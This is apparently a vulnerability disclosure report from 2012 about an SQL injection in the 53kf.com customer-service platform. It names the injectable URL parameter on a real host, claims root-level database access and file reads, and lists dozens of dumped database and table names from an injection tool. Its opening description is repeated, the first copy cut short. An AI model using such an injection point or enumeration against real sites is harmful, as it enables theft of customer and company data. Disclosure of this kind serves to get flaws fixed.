### 简要描述: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物 ### 详细说明: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物 ### 漏洞证明: Target:http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009 Date:2012/10/11 10:24:38 DB Detection:MySQL >=5 (Auto Detected) Method:GET Type:Integer (Auto Detected) ------------------------------------------------------ 数据表 talk Table NameColumns C3P0TestTable access access_log account_switch ad agent_oper agent_style_lock announcement area_kf ask_kw autoreply block_userid company_id guest_id guest_ip start_time release_time block_reason id6d block_trace chat_nation chat_search chat_tables chat_worker company company_ad company_config company_etel company_style company_tinet company_tinet_cno conf_ip1 conf_ip1_old conf_sync...
### 简要描述: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物 ### 详细说明: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~借用一下clzzy的描述就不打字了!求礼物 ### 漏洞证明: Target:http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009 Date:2012/10/11 10:24:38 DB Detection:MySQL >=5 (Auto Detected) Method:GET Type:Integer (Auto Detected) ------------------------------------------------------ 数据表 talk Table NameColumns C3P0TestTable access access_log account_switch ad agent_oper agent_style_lock announcement area_kf ask_kw autoreply block_userid company_id guest_id guest_ip start_time release_time block_reason id6d block_trace chat_nation chat_search chat_tables chat_worker company company_ad company_config company_etel company_style company_tinet company_tinet_cno conf_ip1 conf_ip1_old conf_sync config_id_remark config_value_remark counter cus_bill cus_group cus_link cus_mail cus_sms cus_theme cus_user cus_web_msg customer customer2 customer3 cyy cyy_group daemonlog_recv daemonlog_send download_job email err_infos err_infos_kf etel_logo face file identity identity_role_id ill_words imessage inner_identity kehu_mail kf_group kf_group_newthing kf_group_newthing_old kf_group_upload kf_group_upload_old kf_share link link_room logo logsql mail_template mailqueue message module module_special msg_reply operate_log payment robot robot_mem room_message sms_bill sms_config sms_lword sql_sync stat_keyword_month stat_place stat_search stat_search_old stat_to statistic statistic_from statistic_nation statistic_net sta information_schema Table NameColumns acc Table NameColumns C3P0TestTable cus_user visitor_trace crm Table NameColumns action_log conf_sync crm_ViewDt crm_ViewDt_bank crm_column crm_cust_field crm_cust_linkman crm_customer crm_customer_bak crm_customer_bak2 crm_customer_keywordisnull crm_data_char crm_data_int crm_data_item crm_downexport crm_fieldDt crm_keyword crm_linkman crm_linkman_ViewDt crm_linkman_ViewDt_bank crm_linkman_column crm_linkman_field crm_linkman_fieldDt crm_linkman_view crm_manage_module crm_order crm_public_field crm_survey crm_survey_info crm_survey_question crm_survey_range crm_survey_result crm_view cus_bill cus_link cus_mail cus_sms cus_theme daemonlog_recv daemonlog_send mailqueue operate_log setting help Table NameColumns wp_commentmeta wp_comments wp_links wp_options wp_postmeta wp_posts wp_term_relationships wp_term_taxonomy wp_terms wp_usermeta wp_users income Table NameColumns check_flow check_log check_method expend expend_check_flow expend_summary income operate_log sort summary ip Table NameColumns _city_ip city_ip city_ip0 city_ip10 city_ip13 city_ip16 city_ip19 city_ip22 city_ip25 city_ip28 city_ip31 city_ip34 city_ip37 code_country country_ip new_ip new_ip2 ip_src Table NameColumns city_ip0 city_ip10 city_ip13 city_ip16 city_ip19 city_ip22 city_ip25 city_ip28 city_ip31 city_ip34 city_ip37 code_country country_ip jianyi Table NameColumns jy_feedback jy_feedback_index jy_field jy_logs jy_role jy_tpl jy_userinfo job Table NameColumns qs_ad qs_ad_category qs_admin qs_admin_log qs_article qs_article_category qs_article_property qs_category qs_category_district qs_category_group qs_category_jobs qs_company_down_resume qs_company_favorites qs_company_interview qs_company_profile qs_config qs_explain qs_explain_category qs_feedback qs_jobs qs_jobs_contact qs_link qs_link_category qs_locoyspider qs_mail_templates qs_mailconfig qs_members qs_members_info qs_members_points qs_members_points_report qs_members_points_rule qs_members_setmeal qs_members_type qs_navigation qs_navigation_category qs_notice qs_notice_category qs_order qs_page qs_payment qs_personal_favorites qs_personal_jobs_apply qs_report qs_resume qs_resume_education qs_resume_jobs qs_resume_training qs_resume_work qs_setmeal qs_text kf Table NameColumns 53kf_sync access_log_tgfj ad ad_manage ad_stat admin_agent admin_group admin_logs admin_oper admin_recharge_bill admin_role admin_tinet_article admin_userid user_name real_name password add_time last_login last_ip role_id is_admin recharge_money recharge_coupon agent_apply agent_bbsid worker_id author title content click rep_num type date last_poster last_date agent_bbs_message agent_bill agent_bill_log agent_bill_old agent_check_bill agent_check_money agent_comment agent_company agent_config agent_download agent_group agent_handle_log agent_oper agent_oper_inf agent_oper_log agent_policy agent_price_config agent_receipt_bill agent_receipt_express agent_rights agent_style_lock agent_worker announcement appointment area_kf ask_act_log authentication auto_pay_fail_log autoreply bank_infor blacklist blacklist_log bug_reply_log bug_report bug_report_log category city_app city_case classic_case click_ip company company_account company_ad company_bill company_bill_old company_config company_coupon company_cyy company_etel company_etel_bill company_exp_vouchers company_exp_vouchers_bill company_exp_vouchers_code company_extra company_lottery company_lottery_address company_lottery_log company_mail company_mail_bill company_operation_log company_receipt_bill company_recharge_gift company_sms company_sms_bill company_style company_template company_tinet company_tinet_bill company_tinet_cno company_tinet_open company_tinet_sms company_tinet_time conf_ip1 conf_ip1_bak conf_sync conf_sync_ip config_id_remark config_value_remark consumption_stat coupon_bill cps_commission_log cps_netraffic crm_senduser cus_group customer customer_bill customer_link daemonlog_recv daemonlog_send dingxin err_infos etel_logo face friendlink gggj_spread_log gift_module_log gm_admin gm_company gm_group gm_info help identity index_hot kf_admin kf_center_check kf_class kf_company kf_group kf_handle_log kf_info kf_qytx_group kf_sell login_from_vb logo logsql lost_company mail_template manage_salelist member member_grade_config menu mobile_record module module2 module_bag module_open_setting module_recharge_log module_special module_style_num_bak module_test_log module_try_days order order_cancel order_product outlink_withdrawing_log package_product pay_company pay_company_bymonth pay_company_old payment payment2 payment_multy product product_commend product_exp product_group product_img product_price product_promote product_pub product_recharge_center product_review product_review_replay product_sell_stat purge_cache reg_error reg_sync reply report_badweb review_award robot robot_mem sales_area slave_to_master_sync sms_bill sms_config sms_send_log sms_sp suggest suggest_old suggest_reply suggest_reply_old suggest_type sys_name system_module talk_subject tmp_smslog topic union_company unsubscribe_company v5_ad v5_admin_oper v5_agent_oper v5_cate v5_cate_stat v5_comment v5_comment_del v5_company v5_company_account v5_company_bill v5_company_cate v5_company_config v5_company_indus v5_company_refer v5_company_talk v5_doctor v5_favor v5_friend v5_hotinfos v5_indus v5_ip v5_jubao v5_leave v5_net_ad v5_person v5_person_bill v5_person_cate v5_product v5_refer v5_reply v5_subject v5_sync v5_system_info v5_test v5_worker vip_refer_sync worker worker_config worker_group worker_point_log zs_admin zs_class zs_company zs_group zs_help zs_info zsk_category zsk_key zsk_question kf1 Table NameColumns ad_count ad_count2 city_company daemon daemon_sms finance_bill inout_class inout_site inout_stat kf_tuo kf_tuo070416 kf_tuo_log kf_tuo_mark kf_tuo_rank lottery mailqueue oper_log rank sms_lword sms_queue talk_server v5_chat_count worker mail Table NameColumns mail_account mail_checkuser mail_classify mail_config mail_filter mail_linkman mail_log mail_receiver mail_record mail_role mail_sendmail mail_senduser mail_share mail_template mantis Table NameColumns mantis_bug_file_table mantis_bug_history_table mantis_bug_monitor_table mantis_bug_relationship_table mantis_bug_revision_table mantis_bug_table mantis_bug_tag_table mantis_bug_text_table mantis_bugnote_table mantis_bugnote_text_table mantis_category_table mantis_config_table mantis_custom_field_project_table mantis_custom_field_string_table mantis_custom_field_table mantis_email_table mantis_filters_table mantis_news_table mantis_plugin_table mantis_project_file_table mantis_project_hierarchy_table mantis_project_table mantis_project_user_list_table mantis_project_version_table mantis_sponsorship_table mantis_tag_table mantis_tokens_table mantis_user_pref_table mantis_user_print_pref_table mantis_user_profile_table mantis_user_table mysql Table NameColumns newadv Table NameColumns accountdt alert_config back_money blacklist cart favorites history_order history_orderdt income_money mylink new_order new_orderdt pay_money recharge_money sys_config user webpage website website_type withdrawing_money newcrm Table NameColumns client_class crm_area crm_birthday_tip crm_contact_record_status crm_cust_com crm_cust_linkman crm_cust_share crm_customer crm_customer_care crm_customer_column crm_customer_contact crm_customer_d1 crm_customer_field crm_customer_fieldAt crm_customer_fieldDt crm_customer_view crm_delivery crm_delivery_addr crm_downcenter crm_email_link crm_email_read crm_field_set crm_kf_complaint crm_kf_complaint_type crm_kf_record crm_kf_server_type crm_kf_server_way crm_kf_time_spend crm_kf_urgency_type crm_linkman crm_linkman_column crm_linkman_d1 crm_linkman_field crm_linkman_fieldAt crm_linkman_fieldDt crm_linkman_view crm_logs crm_marketing_activity crm_marketing_activity_type crm_marketing_plan crm_marketing_plan_status crm_marketing_plan_type crm_money_record crm_opport crm_opport_source crm_opport_stage crm_opport_status crm_order_addr crm_order_info crm_order_invoice crm_order_order_sort crm_order_pay_method crm_orders crm_plan crm_porduct_unit crm_product crm_product_sort crm_quote crm_quote_info crm_senduser crm_sfa_log crm_sfa_program crm_sfa_program_pc crm_sfa_xulie crm_sfa_xulie_pc crm_table_num crm_task crm_task_plan_type crm_tasks crm_tool_knowledge crm_tool_knowledge_category crm_tool_mail_receiver crm_tool_notebook crm_tool_reportdiy crm_tool_sendemail crm_tool_sendsms crm_tool_sms_receiver crm_tool_template crm_tool_template_sms crm_workbench customer_sort dictionary dictionary_relation permission setting newoa Table NameColumns company identity module oa_affair_weight oa_asset_flow oa_assets oa_assets_depreciation oa_assets_type oa_attachment oa_attachment_temp oa_book oa_book_type oa_bookdt oa_company_protal oa_doc_group oa_doc_identity oa_doc_worker oa_document oa_favorite_flow oa_fieldarea oa_flow oa_flow_default_worker oa_flowdt oa_flowfield oa_flowgroup oa_flowjob oa_flownode oa_flowstate oa_goods oa_goods_type oa_inform_set oa_layer_attribute oa_linkman oa_linkman_group oa_linkmangroup_acc_dpt oa_linkmangroup_acc_role oa_linkmangroup_acc_worker oa_mail oa_mail_account oa_mail_sys oa_mode_layer oa_msg oa_msg_receiver oa_my_tools oa_news oa_news_reply oa_news_worker oa_nodejob oa_nodeport oa_notice oa_notice_group oa_notice_id6d oa_notice_identity oa_notice_worker oa_parameter oa_pay oa_pay_option oa_portfield oa_print_mode oa_report oa_report_filter oa_report_item oa_reportjob oa_response_time oa_task oa_task_affix oa_task_group oa_task_looker oa_task_msg oa_task_msg_affix oa_task_postpone oa_task_state oa_task_temp oa_task_worker oa_telephone_msg oa_telephone_msg_sys oa_template oa_templatedt oa_view oa_viewdt oa_weather_forecast oa_worker_pay oa_worker_protal oa_workflow oa_workflow_log oa_workflow_logdt oa_workflow_operationlog oa_workflow_worker operate_log permission worker worker_group worker_online_log saas Table NameColumns cus_sms identity operate_log role worker worker_group shouzhi Table NameColumns sz_account sz_baoxiao sz_baoxiao_detail sz_baoxiao_sort sz_in sz_in_detail sz_inout_sort sz_log sz_memo sz_out sz_out_detail sz_role sz_setting sz_summary sz_wage sms Table NameColumns sms_balance sms_blacklist sms_classify sms_config sms_disabled sms_linkman sms_log sms_phrase sms_receivemsg sms_record sms_role sms_sendmsg sms_sendway sms_share tel Table NameColumns tel_blacklist tel_config tel_log tel_number tel_queue tel_recharge tel_role tel_seat tel_seat_period tel_sendmsg tel_style temp_mu Table NameColumns com_talk_online company test Table NameColumns trac Table NameColumns attachment auth_cookie cache component enum fullblog_comments fullblog_posts milestone node_change permission report repository revision session session_attribute system ticket ticket_change ticket_custom version wiki ut Table NameColumns account_switch area_kf block_user chat_nation chat_search chat_worker company company_ad company_config company_style company_tinet company_tinet_cno cus_bill cus_group cus_link cus_theme cus_user cus_web_msg cyy cyy_group file identity imessage kf_group kf_group_newthing kf_group_upload kf_share link message module module_special msg_reply operate_log robot robot_mem sms_config stat_keyword_month stat_place stat_search stat_to statistic statistic_from statistic_nation statistic_net statistic_place talk_his talk_theme talk_vote visitor_lnk visitor_trace worker worker_config worker_group worker_online_log worker_online_log_detail zsk_category zsk_key zsk_noanswer zsk_question ut1 Table NameColumns message sync_worker_stat sync_worker_stat2 talk_his worker ut_cus Table NameColumns cus_user utt Table NameColumns message message_d1 message_d2 message_d3 message_d4 message_d5 message_d6 talk_his talk_his_d1 talk_his_d2 talk_his_d3 talk_his_d4 talk_his_d5 talk_his_d6 utwkbak Table NameColumns company_config worker zentao Table NameColumns zt_action zt_bug zt_build zt_burn zt_case zt_caseStep zt_company zt_config zt_dept zt_doc zt_docLib zt_effort zt_extension zt_file zt_group zt_groupPriv zt_history zt_module zt_product zt_productPlan zt_project zt_projectProduct zt_projectStory zt_release zt_story zt_storySpec zt_task zt_taskEstimate zt_team zt_testResult zt_testRun zt_testTask zt_todo zt_user zt_userGroup zt_userQuery zt_userTPL
